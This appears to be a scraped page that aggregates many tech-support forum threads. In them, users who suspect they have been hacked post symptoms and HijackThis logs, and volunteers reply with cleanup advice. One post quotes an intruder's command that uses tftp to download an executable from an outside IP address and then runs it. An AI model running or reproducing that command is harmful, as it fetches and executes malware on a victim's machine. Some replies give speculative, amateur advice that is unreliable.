Hey guys, i suspect that i have been hacked because my DVD rom drive opened by itself this afternoon, and then again just now. This has never happened before and I was not doing anything while it happened.Another reason I believe I may have been hacked is that my friend (maybe not so much) came over last week with his laptop and asked for the password to log onto my wireless router. I am very suspicious of him.here is my hijack this log, please tell me what else I can do to get to the bottom of this.Thanks!Logfile of Trend Micro HijackThis v2.0.2Scan saved at 10:04:41 PM, on 2/5/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16762)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Lavasoft\Ad-Aware\AAWService.exeC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\RTHDCPL.EXEC:\WINDOWS\SOUNDMAN.EXEC:\Program Files\Winamp\winampa.exeC:\Program Files\Nero\Nero 7\InCD\NBHGui.exeC:\Program Files\Nero\Nero 7\InCD\InCD.exeC:\Program Files\Java\jre6\bin\jusched.exeC:\Program Files\iTunes\iTun... Read more

Answer:I Think I've Been Hacked

Welcome to the BleepingComputer Forums. Since it has been a few days since you scanned your computer with HijackThis, we will need a new HijackThis log. If you have not already downloaded Random's System Information Tool (RSIT), please download Random's System Information Tool (RSIT) by random/random which includes a HijackThis log and save it to your desktop. If you have RSIT already on your computer, please run it again. Double click on RSIT.exe to run RSIT. Click Continue at the disclaimer screen. Please post the contents of log.txt. Thank you for your patience.Please see Preparation Guide for use before posting about your potential Malware problem. If you have already posted this log at another forum or if you decide to seek help at another forum, please let us know. There is a shortage of helpers and taking the time of two volunteer helpers means that someone else may not be helped. Please post your HijackThis log as a reply to this thread and not as an attachment. I am always leery of opening attachments so I always request that HijackThis logs are to be posted as a reply to the thread. I do not think that you are attaching anything scary but others may do so. While we are working on your HijackThis log, please: Reply to this thread; do not start another! Do not make any changes on your computer during the cleaning process or download/add programs on your computer unless instructed to do so. Do not run any other tool until instruc... Read more

2 more replies
Relevance 58.22%

Hello,I need help.  I believe my pc has been hacked but I am not sure...I scan and looked in my startup files and that is where I stopped.    Nothing came up.The only clues I have that make me think I have been hacked are these:after I log in - my desktop takes a really long time to load..and behind the icons on my desktop..I can almost see what looks like an open web browser page..its faint and somewhat embossed...Can anyone help?

Answer:I think I have been hacked...

http://www.computerhope.com/forum/index.php/topic,46313.0.htmlgo to above and post the 3 logs an expert will see them

1 more replies
Relevance 58.22%
Question: I've been hacked!!

Ok, so its nothing major like my credit cards or banking, but its my World of Warcraft account ( I know, I know). But it has been hacked everyday for the last 4 days. I have done password resets on my email account and on my gaming account many of times. Everytime I get my account restored it gets hacked in a matter of minutes again. I even reformatted my laptop this morning. Got my account back, just for it to get hacked again. Their support team says it might be a key logger that didn't get wiped or just my email account being compromised. I am planning on making a new email account on google after I make sure my system is clean. Below I will paste the "hijack" text, the "DDS" text, the "Attach" text and the "rkill" text. Each time I run the gmer my computer crashes. If you have advice on that I will try it again and reply with it. Thanks in advance for taking your time to try and help me with my issues.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 2:58:52 AM, on 12/12/2010
Platform: Windows Vista (WinNT 6.00.1904)
MSIE: Internet Explorer v7.00 (7.00.6000.16982)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\mobsync.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\RtHDVCpl.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Microsoft Security Essentials\msseces.exe
C:\Program Files\Spybot - Searc... Read more

Answer:I've been hacked!!

Bumping in hopes to be helped!
 

1 more replies
Relevance 58.22%

Metalicboy 99 (9:01:22 PM): hi
NewCents03 (9:01:08 PM): hey
NewCents03 (9:01:24 PM): who is this
Metalicboy 99 (9:02:11 PM):
Metalicboy 99 (9:02:39 PM):
Metalicboy 99 (9:02:39 PM):
Metalicboy 99 (9:02:39 PM): IP Steal, Mofo!

he first invited me to a chat which i accepted like an idiot then he tried to send me a file which i rejected immediately then after i rejected a set of broken image icons came up where those blanks are then he said that and signed off immediately. what should i do? im not sure what just happened. i know its not anyone i know cause i only use that sn on forums so help me out

btw im running windows vista ultimate in case that helps i just dont want him being able to have access to my computer and putting stuff in it and taking stuff from it.

More replies
Relevance 58.22%
Question: PC Hacked :(

Hi guys. I appreciate you reading my post. I was running REAL VNC 4.1.2 its a program that i can use to remote access my pc with my pda. Today I noticed someone typing this into my Run command
"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 63.252.66.11 GET vuzwq.exe & start vuzwq&"

I dont know what that means. But i ran hijack this and here is my log file.

Logfile of HijackThis v1.99.1
Scan saved at 12:45:25 PM, on 5/22/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16441)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\arservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\InterVideo\DeviceService\DevSvc.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\iaantmon.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\Intel Audio Studio\... Read more

Answer:PC Hacked :(

bump (48 hours)

3 more replies
Relevance 58.22%

I have a very strong password, which I recently changed. Today I came to my computer and Pidgen was logged out and it said "logged out due to connected from somewhere else". This is not right... how would someone have gotten into the account, and how would I tell? Everything looks ok, like I don't see contacts added or deleted or anything.

I'm not really that worried as there's nothing confidential, but what worries me is how they got the password in first place. Is there a known issue with MSN going on or something?

I have a pfsense firewall, what would I look for in there to see if someone is trying or has successfully hacked into my network? Everything is fairly secure as far as I know, but obviously someone managed to get my msn password somehow. It's in a PINs database, which they would of had to brute force the password to. That means they got all my other passwords too. I just can't see how anyone would have gotten on my network though, but now I'm paranoid.
 

Answer:Anyway to tell if my MSN got hacked?

Red Squirrel said:





I have a very strong password, which I recently changed. Today I came to my computer and Pidgen was logged out and it said "logged out due to connected from somewhere else". This is not right... how would someone have gotten into the account, and how would I tell? Everything looks ok, like I don't see contacts added or deleted or anything.

I'm not really that worried as there's nothing confidential, but what worries me is how they got the password in first place. Is there a known issue with MSN going on or something?

I have a pfsense firewall, what would I look for in there to see if someone is trying or has successfully hacked into my network? Everything is fairly secure as far as I know, but obviously someone managed to get my msn password somehow. It's in a PINs database, which they would of had to brute force the password to. That means they got all my other passwords too. I just can't see how anyone would have gotten on my network though, but now I'm paranoid.Click to expand...

Are you able to change your password on msn ? Does your other computer have msn messenger ?
 

3 more replies
Relevance 58.22%

Ok i was silly went to a Hack forum. Very popular downloaded some program i ran it. It disabled lots of stuff of mine..This is the website http://www.hackforums.net/showthread.php?tid=612287 with the info on it if you want to check it out.Control Panel.Task ManagerRunFirewallRegeditDisabled right click on desktopApp dataDocuments/setting foldersI think Spywareblaster is also blocked.. It says Error while unpacking program, code C. Please report to author.Lots of other stuff i cant remember. It said it was undetectable.Nod32 pops up with this twice already.Im scanning with Nod32.Malwarebytes.Spybot S&D.Superantispyware.Windows Defender.Got this so far...From Malwarebytes Registry Values Infected:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\nofolderoptions (Hijack.FolderOptions) -> Delete on reboot.Registry Data Items Infected:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (Hijack.Regedit) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun (Hijack.Run) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr (Hijack.TaskManager) -> Bad: (1) Good: (0)... Read more

Answer:Ive been hacked i think..

Got a few things back.

13 more replies
Relevance 58.22%
Question: Hacked!

Hello.
I have a problem with my computer.. One of these days I noticed something really weird. The folder where Windows is located shows more folders. with weird names, and some files appears with no reason in my documents
I already run the antispyware (AVG) and the antivirus AVAST and hey deleted a bunch of spywares an a trojan... but now, when I look for info in google or yahoo it redirect me to other pages like this one:

http://weddingcamerasplace.com/samsa...t=2&rpt=1&kt=1

Also sometimes the computer gets like crazy moving the mouse by itself at high speed opening things and changing the toolbar and opening the task manager.
Also (this happened on Monday 9) the way to log on on windows (here are 5 diferent users) was changed, only the posibility to choose one was available, and when I went to control panel to see what was going on. it says that the setting for log the user was changed, the buttons for change the way of how the user log on were dissabled and only says something related with the netware OS options.
I make a restore point. and I was able to get as before... but for sure someone is changing things here... please advice me what shall I do... thanks

Answer:Hacked!

Welcome to the Tech Support Forums. Since it has been a few days, please post the two text files, main.txt and extra.txt produced by theDeckard's System Scanner (formerly Comboscan) as instructed in IMPORTANT - Read This Before Posting A Log.

1 more replies
Relevance 58.22%

Recently my computer has gone crazy...

My internet will work fine and then it will stop working all together and I have to reboot then it works fine again for a litte while..

My IM programs are not working and the only thing I can use properly still is IRC

I use opera as my browser.

I run a firewall and AV

I did a hijack this log I also ran trojanremover

My cpu usage is massive and I have had someone with malicious intent towards me..

I am at a loss tothink what else to do...

Here is my log anyhelp would be very appreciated

Logfile of HijackThis v1.99.1
Scan saved at 4:14:24 a.m., on 8/04/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Real Alternative\Update_OB\realsched.exe
C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe
C:\WINDOWS\vsnpstd.exe
G:\F-Secure\Common\FSM32.EXE
C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
C:\WINDOWS\ATKKBService.exe
G:\F-Secure\Anti-Virus\fsgk32st.exe
G:\F-Secure\Common\FSMA32.EXE
G:\F-Secure\Anti-Virus\FSGK32.EXE
C:\PROGRA~1\WHATPU~1\WHATPU~1.EXE
G:\F-Sec... Read more

Answer:Help I think I have been hacked

Bump.. please anyone..

13 more replies
Relevance 58.22%

Hello,

I clicked on a link 2 weeks ago and got a mass of Trojans and Viruses Jump onto my system.

I rebootes and ran scans with various softare. ( SpyBot SD, SpyWare DOctore,, Ewido , ASquared, Hijack This) and came up with alot of results wasnt able to completely erase them.

I cant read or understand any of that Code stuff.. I have been trying eveything to fix this to no avail..

Your help would be greatly appreciated .

Now my Computer Is Very Slow and BOgged down , Getting lots of error messages, Showing me blank screens .. And generally Not working..

I get lots of Messages saying : My Buffer is Being Overrun !

I think I;ve been Hacked !
Cheers'

Ed -

Here is my Info :

My System Specs: DELL
Intel Pentium 4 CPU 3.00 Ghz, 512 MB RAM, NVIDIA GeForce FX 5200
Windows XP Professional 2002
service pack #2

Norton Antivirus:
can type: Realtime Protection Scan
Event: Virus Found!
Virus name: Downloader
File: C:\System Volume Information\_restore{2AD92CD6-171A-45FB-9EBC-5535A28846A0}\RP1\A0000002.exe
Location: Quarantine
Computer: USER-EY35M5DWTN
User: SYSTEM
Action taken: Clean failed : Quarantine succeeded : Access denied
Date found: Sat Nov 11 10:21:19 200
--------------------------------------------------------------------------------------------------------
Symptoms:
When computer is turned on a notice that Windows Firewall is Turned Off appears. WHen I check it it says it is turned on...
SAFE MODE : Does Not Work.. Shows up as black screen with Safe mode writ... Read more

Answer:Help I've been Hacked !

16 more replies
Relevance 58.22%
Question: Did I get hacked?

I go to Omegle usually. Last December, someone flooded the sentence "YOU HAVE BEEN HACKED" and then suddenly my computer got slow and was blowing a lot and the browsers and programs and folders stopped working (freezed) right after opening them, and then I restarted the computer, but after restarting the computer was still slow and the browsers and programs and folders still stopped working right after opening them, but then after 1 hour, they didn't stop responding anymore, but I saw that my WLAN was disable, so that was a Denial of Service attack. 2 days later, 2 people in Omegle said things that seem like they saw me, and then few days or weeks later, I saw in my deviantART's stash one unknown drawing with weird symbols and it was not drawn by me, but I didn't see any weird sessions logged in the deviantART session list. Then about 2 weeks or 1 month later, a person said that my hair is cool. And when I told them that I reported the hackers to the police, a person in Omegle said something, and then suddenly the next time when I start a conversation, I get the CAPTCHA thing, or the "error, could not connect to Omegle", or the thing that it will never lead me to the new conversation.

Did I get hacked? I checked with my Malwarebytes and ZoneAlarm and TuneUp utilities for malware or viruses, and no viruses or malware were found.

And I remember that I told Omegle many times my first name only, then someone asked in Omegle that who am ... Read more

Answer:Did I get hacked?

Yha, you may, even most likely, did. The latest malware can turn on your webcam. You may not have known, but you most likely did click, or got hit by a drive by.

To be safe, cover/turn your cam if you prefer not to be inadvertently seen by weirdos.

If you can, just completely wipe and reinstall windows. Only real way to be sure it's gone.

Oh, and be happy, you're a Princess after all

9 more replies
Relevance 58.22%
Question: I have been hacked

Hi all. My Battle.net account and my gmail account were hacked yesterday. I am now using a different computer and have reset the passwords. I believe i must have a keylogger on my computer but have been unable to find it. I have run my Norton Antivirus, Spybot Search & Destroy, SuperAntiSpyware, CCleaner, Eset Online Scanner and Malwarebytes with nothing being found. I have run Hijackthis but i'm not sure how to read it. Help please! Thanks!

Answer:I have been hacked

At this point you may want to follow the steps here:http://www.bleepingcomputer.com/forums/topic34773.html

4 more replies
Relevance 58.22%
Question: WoW got hacked.

Hi

As title says, my World of Warcraft account got hacked.
I do not know how it happend.
My antivirus(trendmicro internet security pro) is up to date, BUT I might have disabled it while testing stuff and forgotten to turn it on again after testing.
Mail from Blizzard (the maker of WoW) said that I have had a trojan or keylogger.
What Blizzard base this on I dont know, maybe just because that is what happends most.

I would appriciate if I could get help so I can sleep better at night

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 14:58:05, on 26-05-2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18904)
Boot mode: Normal
Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Logitech\GamePanel Software\LCD Manager\LCDMon.exe
C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe
C:\Program Files\Lexmark 3600-4600 Series\lxdxmon.exe
C:\Program Files\Lexmark 3600-4600 Series\ezprint.exe
C:\Windows\System32\nvraidservice.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
C:\Windows\WindowsMobile\wmdc.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\TomTom HOME 2\TomTomHOMERunner.exe
C:\Program Files\MagicDisc\MagicDisc.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\ehome\eh... Read more

Answer:WoW got hacked.

9 more replies
Relevance 58.22%

I have been advised by "Resolution" to bring this question here from this thread:
http://www.techsupportforum.com/showthread.php?t=72574

Heres the background:

"How to close unwanted ports?

--------------------------------------------------------------------------------

Hope someone can help a newbie?
I have a new system (3 weeks) P4, 3.0 GHz runing XP SP2, all updated. With the system came Norton Internet Security, loaded & updated. I then joined a new ISP who supplied a ADSL router (iconnect Access621)
The router has a hardware firewall enabled, NIS firewall is on and I have tried with XP firewall on or off.
PROBLEM: I noticed the icon in notification area flashing activity even though I had no browser or email open. Double clicked it, the Activity - sent was running wild; current figures are: sent-1,359,939,568(!!); receieved-202,004,344.
I cannot imagine what has been sent, I have not loaded much data on this machine yet.
I ran Norton "check security" it advised that I was "exposed to hackers". More info showed ports open:
ICMP Ping
23 Telnet
113 Ident/Authentication
The solution proposed: Instal a personal firewall eg NIS (!!!)

I have been advised to close these ports: Neither Norton, system supplier or my ISP can tell me how to do this!!
Please Help, I believe that I am under attack even though I have done all the right things.
Thanks
Timthepoolman"

I have followed the step by step from jgvern... Read more

Answer:I think I am being hacked?

Tim, that log doesn't look quite right. Was it run in Safe Mode by any chance?

Please post a new log, but this time do not run it through the Analyzer, please. Also be sure to run it in normal mode, if you didn't before.

Thanks.

5 more replies
Relevance 58.22%

Thank you in advance -- My computer was hacked a few months ago (Win XP) so I decided to upgrade and clean install Win 7 64x. I configured my router according to all the safety manuals, as well as my Comodo firewall w/Defense+ (in painful detail so I got it right and set to maximum security). Also had F-Secure running, Malawarebytes & 64x SuperAntiSpyware.

I was in a standard user account and then switched users to my Admin acct (I had not logged into Admin acct that day I'm 99% positive). When I got into the Admin account the background screen was black, the User Credentials folder was open on the screen as well as a system monitor. This was the 2nd day after the clean install! When I first connected to the internet, my firewall was already set up (from CD that I downloaded from Comodo and scanned for malware) and router fully configured. First thing I did was download all Windows updates and patch dll vulnerability.

I had been doing backups along the way at each step w/ Acronis True Image, and after this I immediately went to backup (disconnected from internet and logged as Admin) and couldn't access Acronis -- said I didn't have necessary privileges, even as Admin! SO, I had to reinstall Acronis to get it working. Finally, I uninstalled an Nvidea Physxs thing I had and it said "Admin has set..."some policy or something, so I used Revo to get rid of it.

My friend referred me to you and had some guesses: possibly ICMP or Tered... Read more

Answer:Hello All -- I've definitely been hacked

Here's an update -- My boyfriend was looking at my registry keys last night (he's been helping me and has been on this board the past few weeks, so if this sounds familiar it's just my computer, not some new evil spreading around) and there was something called Ipv6 Tunnel, and something else called PIP (I think) tunnel a little below that. Should these be there? Sorry to sound so ignorant but I'm not very good with computer internals. Would be nice to plug it in without being afraid though! Okay thanks. PS I did take another look at my router guide and there's a section about VPN Tunnels which are enabled by default -- I didn't do anything with that in setting it up because it didn't seem like a threat, but now this "Tunnel" word really worries me. Bye

18 more replies
Relevance 58.22%
Question: Hi-hacked?

am you help?


Logfile of HijackThis v1.99.0
Scan saved at 1:20:46 PM, on 3/14/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\acsd.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\system32\slserv.exe
C:\WINDOWS\wanmpsvc.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\mHotkey.exe
C:\Program Files\eM\Bay Reader\Shwicon2k.exe
C:\Program Files\Roxio\Easy CD Creator 6\DragToDisc\DrgToDsc.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\BigFix\BigFix.exe
C:\Program Files\Nikon\NkView6\NkvMon.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
c:\windows\system32\adprot.exe
C:\Program Files\HijackThis.exe
C:\WINDOWS\system32\ngpw36.exe
C:\Program Files\Microsoft AntiSpywa... Read more

Answer:Hi-hacked?

Hi Sd80mac and welcome to TSF.

I am currently reviewing your log. Please note that this is under the supervision of an expert analyst, and I will be back with a fix for your problem a.s.a.p

Please be patient with me during this time.

We also suggest that you Subscribe to this thread to be notified of fixes as soon as they are posted by our Team. You can do this simply by clicking the "Thread Tools" button located in the original thread line and selecting "Subscribe to this Thread".

2 more replies
Relevance 58.22%

Hello, I have a problem with my pc that is only a year old & was wondering if anyone would throw some light on the matter?

I have an AMD Sempron 2200 processor with Abit VA-20 mobo. With Windows XP Home.
I use Norton internet securoity & a usb modem.
My pc has ran fine for the last year and the problem started the other day..

The other day it froze on shutdown & I had to turn it off at the plug. Then when I started it up the next day it would only let me boot in safe mode, with no networking capabilities either. So I decided to format & reinstall.
Since then Ive formatted 3 times & reinstalled, all with the same result. After a few hours it freezes & when I start it up again it gets to the windows page, a blue screen flashes up so quick I cant read it, & then it reboots again & again, round & round in circles, with thiis blue screen flashing up.
So now the only way I can get it to start up properly when this happens is by getting my windows disc & opting to 'repair' windows. (so I wont lose all my data again) which although isnt as time consuming as formatting, is still time consuming enough for me not to want to do it every few hours.

A couple of other little bits of info that may help or may not...

1) Before my system froze up the first time I had aquired a piece of software for removing software that couldnt be removed with the usual uninstall software.The piece of software that was proving hard to remove was some Noki... Read more

Answer:Im getting really hacked off with this now...

15 more replies
Relevance 58.22%
Question: Was I hacked?

Hi: Last night, my computer was fine. This morning, all my programs started up fine. Then when I clicked on a shortcut, it said that this program does not have a program associated with it for performing this action, create an association for it in the Folder Options control panel. When I go into MY Programs folder, and try to open them up, the search file opens up! I can access my internet and some programs by right-clicking and choosing run as...Owner, etc., but I can't open Messenger or Outlook Express. When I try to accesss programs that require an administrater to use, like system restore, I am not recognized as administrator, and the program won't start. My firewall and antivirus programs won't start either. Help me please.
 

Answer:Was I hacked?

You MAY have a virus/trojan. If possible, remove the hard drive and install it in another computer that has anti-virus software and scan your hard drive. You can also try an online virus scanner, but I don't think those are as good or as comprehensive as dedicated AV software.
 

2 more replies
Relevance 58.22%

Hi guys, so I know this seems stupid. but I am a littl ebit paranoid I have been hacked,

I am not what you would call a prime candidate, clean system, don't browse unsafe sites, etc etc. I run windows firewall and microsoft security essentials. I am behind a Billion Bipac 7800N modem router, however "Block WAN PING" and "Intrusion Detection" were not turned on, they are now.

Basically I was browsing reddit and chatting on facebook when all of a sudden, the typing line that comes up just kept going to the right, no matter ewhat i pressed it just kept sliding to the right and starting a new line, then i clicked a few different convo windows, then tried to close firefox, thinking it had just fucked up.

basically then everything was scrolling to the bottom and closing windows wasnt working and nothing i clicked wa sresponding, like it didnt register.

I then manage to try and shut down the computer, wasnt working,

I managed to right click and disable my network adapter (ethernet) and straight away everything started responding again and the computer shut down imedietly,

Restarted now and running a scan and everything is working perfectly...

any advice guys or thoughts? random software anomoly or have I been compromised?

PS I am not a noob and have average understanding of things so feel free to get a bit technical with me.

Thanks in advance.
 

Answer:Think I got hacked?

Try running additional scans with some of the programs recommended in the malware thread. (MBAM, Spybot, etc) Being a safe web user is important but more and more it's not just about the websites you goto. There's a risk of getting infected/attacked through ad networks that run on forums or hijacked links.

Either way, it could have just been a fluke. Run scans with software besides what you currently use just to double check.
 

11 more replies
Relevance 58.22%

For the past couple of weeks my laptop has been acting up. Whenever I'd boot it up, all of my accounts (Email, Facebook, YouTube, etc.) were logged out every time, my Netflix password was actually changed. It's been running very slowly too. I have a simple router and modem and I use Wifi and only a few other people in the house use it. I have good knowledge about computers but barely any on security, firewall etc. The data my laptop receives from the connection is off the charts compared to the data sent; after being connected to my Wifi for roughly 5 hours the data sent is about 107,000,000, and the data received is around 4,000,000,000. I'm currently running Windows 7, and my firewall is working fine as far as I can tell. Any ideas?

Answer:Have I been hacked?

that sounds pretty bad. you might seriously compromised if u can do a fresh re install of windows and then change all ur pass for ur email and such. if you change em now and someone is seeing what u do wont do u any good. you could also have a virus either way a fresh wipe would be good if is possible for you to do so.

9 more replies
Relevance 58.22%

I need help, and fast really

I have done the usual things, ran antivirus, malwarebytes

I got a phone call from someone who said they were from Microsoft

They gave me all my details, PC number, operating system, even the disc number of my operating system, they had my name, DOB, email address, my home address, my phone number (I dont give out my land line number, but when I got my OS, I had to give that to MS) only thing that was missing was my inside leg measurement, they seemed to know everything about my PC and me (even knew what page I was on)

They were very convincing, and as I have been having problems with my PC and sent them error reports, I thought they were the real deal (I have never contacted MS before, so didnt have the number to call em back

Anyway, they got control of my PC, then started deleteing stuff, I pulled the plug when I saw stuff going, but then they called me back and started taking the p*** about how my PC wouldnt work any more (I'm glad to say it does)

They sounded like the usual Indians in India that MS employ

But how do I find out if they can still access my PC ?

How do I find out if they have put a 'back door' into it ?

Shall I change my router password ?

I have turned off any remote access to my PC

I am running various malware and anti virus software (so far nothing has been found)

I cant find anything that isnt working any more, it seems fine

There are no new accounts on my PC (that I can find)

I havent been on any b... Read more

Answer:Help, I think I have just been hacked

7 more replies
Relevance 58.22%
Question: I'm getting hacked

Hello

My aunt told me to be exact so I will describe all of my difficulties, including the symptoms of my phone too which I think is hacked.
I have had my computer for 6/7 years and I've had obscure troubles using internet, running problems, turning my PC on and off and even using my cursor.

A while back, when I was using my computer ( which I mainly use for games) when I would move my mouse, the cursor would lag, move slowly or not respond at all. I describe it as flickering, if I would drag the cursor from the left side of my screen to the right than it would move and stop and move and stop on and on again. I replaced my mouse many times, changed the batteries and I tested wireless and corded mouses. It was very frustrating but eventually the problem ceased.

Another problem I had was when sometimes my screen would turn black and I would have to use the power button to shut it down and start and then restart the computer in safe mode to shut it down again.

I also often have troubles with internet, I would have internet access with my phone or my laptop but my PC would have no internet and it is plugged directly in the router so this is strange.

Now, I just got back from vacation and before I had departed, my I was having more internet problems, my monitor was sometimes going black, and a weird icon was visible in the system tray. It was a blue circular icon with a white x and when I clicked on it, nothing would happen and if I hovered my cursor over it, it would say ... Read more

More replies
Relevance 58.22%

Hi people
 
First of all, I get the impression that things are rather strict on here so I apologise if I've not put this into the correct section.
 
Last year I had discovered I was hacked and did away with that particular system (still have it, just refuse to ever use it again)
 
I ended up buying another, only to feel that the hacker had full access to my network and 'possibly' re-infected this new system. After only a few days I had to go back to factory default because It was just a blank screen with nothing but the Wi-Fi icon showing. Something similar happened on my previous LT that locked me out until it decided to work as normal after turning it off for around 12 hours.
 
I've had nothing but weird things happen to it constantly, from system settings being unavailable/disabled, my VPN settings being changed (only decided to use one for the first time a few months back, but feel it may be pointless), my AV constantly telling me that my network isn't safe ("Your network router is accessible from the internet") and a random blue screen is showing for short periods every now and then. I'm also receiving HIPS warnings about files being downloaded when I haven't even been downloading anything. Not to mention my IP is now located hundreds of miles away from where I actually live. This is strange because for as long as I've been with my ISP they have always had the location within a reasonable distance. Last year when I realised I'd been hacked it was a si... Read more

Answer:More than likely, hacked!

Are you able to provide screenshots? What AV are you using?

31 more replies
Relevance 58.22%
Question: I think im hacked

hey guys,
 
I'm getting redirected/filtered search results on any browser, denied access to suspicious files AV skips most files in scans.
 
downloads even get hijacked or maybe they get infected once downloaded?
 
I'm on win7 with bullgard AV
 
Thankyou

Answer:I think im hacked

Welcome to BC...
 
Use CCleaner to remove Temporary files, program caches, cookies, logs, etc. Use the Default settings. No need to use the
Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.
After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.
CCleaner - PC Optimization and Cleaning - Free Download
 
Download Malwarebytes' Anti-Malware from Here
Double-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).
Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.
Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.
Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.
Click the Scan tab at the top of the program window, select Threat Scan and click the Scan Now button.
If you receive a message that updates are available, click the Update Now button (the update will be downloaded, installed, and the scan will start).
When MBAM is finished scanning it will display a screen that displays any malware that it has detected.
Click the Remove Selected button.
MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order... Read more

7 more replies
Relevance 58.22%
Question: Hacked??????

I'm concerned that I may have been hacked in the last couple of months.

I'm running Windows XP

I noticed that all of a sudden my computer slowed right down, and at the same time, my facebook account would not let me log in unless I logged into a different account first. I would always get the "this page is not...blahblah." If I logged into another facebook account first and then went back to my primary account, I could open the page.

This week, I learned that someone has been fraudulently using my credit card and since the card has not left my purse in the last 6 months, I figure that the information must have been taken from my computer. The only place I use my credit card online is at ebay, paypal, and amazon as far as I can remember.

Here is my hijackthis log.

Logfile of HijackThis v1.99.1
Scan saved at 12:42:33 PM, on 9/30/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
